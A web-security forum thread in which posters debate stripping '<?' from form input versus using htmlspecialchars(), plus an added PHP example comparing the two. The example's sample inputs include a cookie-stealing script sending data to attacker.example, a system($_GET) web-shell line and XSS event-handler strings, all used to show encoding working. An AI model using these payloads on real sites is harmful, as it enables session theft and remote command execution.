Author Topic: Unfiltered form accepts <script> tag , it's dangerous ?  (Read 2898 times)


Offline ande

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #15 on: December 13, 2013, 11:46:12 pm »
What do you mean? How am I supposed to run eval() if I can't enclose it in a <?php tag?

No. What I mean is that it is not directly dangerous to store PHP code in the database, as it will not be executed if you just print it to the page. In order for that to be dangerous you would have to run the database result through the eval() function for it to execute.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline invader7

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #16 on: December 13, 2013, 11:52:44 pm »
No. What I mean is that it is not directly dangerous to store PHP code in the database, as it will not be executed if you just print it to the page. In order for that to be dangerous you would have to run the database result through the eval() function for it to execute.


Yes :) OK, thanks a lot!!!

Offline invader7

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #17 on: December 14, 2013, 01:03:20 pm »
I think you're missing the idea here.

Security should be designed into your software, not added in as an afterthought. This whole "it doesn't matter, it's a quick fix now" ideology is stupid.

Design the software with security in mind; don't design it to have security patched in later. It will not be as effective.

I think your thoughts are right, thanks!

You take input and sanitize it.

Let's say you check for that string specifically... would it cover

<?php echo phpinfo(INFO_MODULES); ?> or any number of other ways it can be modified? How about every other way other tags can possibly be implemented? You don't strip entire bits of code... you strip/sanitize what makes it code.

No, this isn't dangerous, because I'm searching for <?php, not the whole phpinfo()... so when I find <?php I make it <!--?php
« Last Edit: December 14, 2013, 01:03:41 pm by invader7 »

Offline ande

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #18 on: December 14, 2013, 02:44:31 pm »
Honestly you should just use htmlspecialchars() or htmlentities(), either on insert or on output from DB.
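Putting the two approaches from Reply #17 and Reply #18 side by side, as an added example that is not code from any poster in this thread: the "<?" to "<!--?" rewrite described in Reply #17 versus htmlspecialchars() on output as recommended in Reply #18, run over a handful of constructed form submissions. The helper names (blacklist_php_tags, encode_for_html, contains_live_script) and the sample payloads are my own for the demonstration; none of them come from the thread.

```php
<?php
// Added example (not from the thread): a "<?" blacklist versus output encoding.
// Runs stand-alone from the CLI: php example.php

declare(strict_types=1);

/**
 * The approach from Reply #17: look for "<?" (which also covers "<?php" and
 * "<?=") and turn it into an HTML comment opener. It only touches PHP tags,
 * and stored PHP source is inert anyway unless something passes it to eval().
 */
function blacklist_php_tags(string $input): string
{
    return str_replace('<?', '<!--?', $input);
}

/**
 * The approach from Reply #18: output encoding. The HTML metacharacters
 * < > & " ' become entities, so the browser renders the stored text as text,
 * never as markup or script. Use this at the point where untrusted data is
 * printed into an HTML body or a quoted attribute.
 */
function encode_for_html(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Does the text, if printed into a page, still contain a live <script> tag? */
function contains_live_script(string $html): bool
{
    return preg_match('/<script\b/i', $html) === 1;
}

// Constructed sample submissions (made up for this example, not real data).
$samples = [
    'php'    => '<?php echo phpinfo(INFO_MODULES); ?>',
    'short'  => '<?= system($_GET["c"]) ?>',
    'script' => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'event'  => '<img src=x onerror="alert(document.domain)">',
    'attr'   => '" onmouseover="alert(1)',
];

foreach ($samples as $name => $payload) {
    $blacklisted = blacklist_php_tags($payload);
    $encoded     = encode_for_html($payload);
    printf("%-7s blacklist: %s\n", $name, $blacklisted);
    printf("%-7s encoded:   %s\n", '', $encoded);
    printf("%-7s live <script> after blacklist? %s  after encoding? %s\n\n", '',
        contains_live_script($blacklisted) ? 'yes' : 'no',
        contains_live_script($encoded) ? 'yes' : 'no');
}

// Where stored PHP actually becomes dangerous (Reply #15): only if some code
// path hands the database result to eval(). Printing it just shows text.
$stored = 'return 6 * 7;';                            // pretend this came from the DB
echo "Printed: " . encode_for_html($stored) . "\n";   // inert text on the page
echo "eval'd:  " . eval($stored) . "\n";               // executes and prints 42
```

The run shows the blacklist leaving the `<script>` and `onerror` payloads untouched while the encoded versions carry no live tag at all, which is the point of Reply #18: the dangerous characters are neutralised regardless of which tag or attribute the attacker used. Two practitioner caveats that the thread does not spell out: encode at output time rather than on insert, so the database keeps the raw text and other consumers (a JSON API, an email template) are not handed pre-encoded data; and htmlspecialchars() is the right tool only for the HTML body and quoted attribute contexts, so data printed inside a JavaScript string or a URL needs that context's own encoding instead.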

Offline invader7

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #19 on: December 15, 2013, 08:34:23 pm »
And you've obviously made sure short tags and such are disabled as well?

Obviously yes :) You mean <? and <?= ? I'm searching for the two characters <?. Something else in mind?

Honestly you should just use htmlspecialchars() or htmlentities(), either on insert or on output from DB.

Yes, you are right! It's a targeted product for a closed group of people who are not supposed to hack it, and it's in production. But you are right, I will follow :)

The best way to write safer code is manage to bypass your own code and then improve it ;)
« Last Edit: December 15, 2013, 08:34:54 pm by invader7 »

Offline techb

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #20 on: December 15, 2013, 09:03:07 pm »

Yes you are right ! , its a targeted product for a closed group of people who are not supposed to hack it and its on production. But you are right , i will follow :)



I was a "production" employee at an ISP tech support center; the amount of fail they had in their systems was epic. People like me, and people like in "production", WILL break things. Don't assume all others are stupid. I ran circles around the IT at my last job, and they all thought it was my supervisor. I quit on my own terms and my supervisor is still there; just don't underestimate the little guys. I did stuff to break systems in a few jobs I had. Lulz, use PuTTY again, I DARE ya, Mr. Telemarketer.

>>>import this
-----------------------------

Offline invader7

Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #21 on: December 15, 2013, 09:14:34 pm »

I was a "production" employee at an ISP tech support center; the amount of fail they had in their systems was epic. People like me, and people like in "production", WILL break things. Don't assume all others are stupid. I ran circles around the IT at my last job, and they all thought it was my supervisor. I quit on my own terms and my supervisor is still there; just don't underestimate the little guys. I did stuff to break systems in a few jobs I had. Lulz, use PuTTY again, I DARE ya, Mr. Telemarketer.


Production = development, sorry, my mistake!! I wanted to write development stage, not production!!!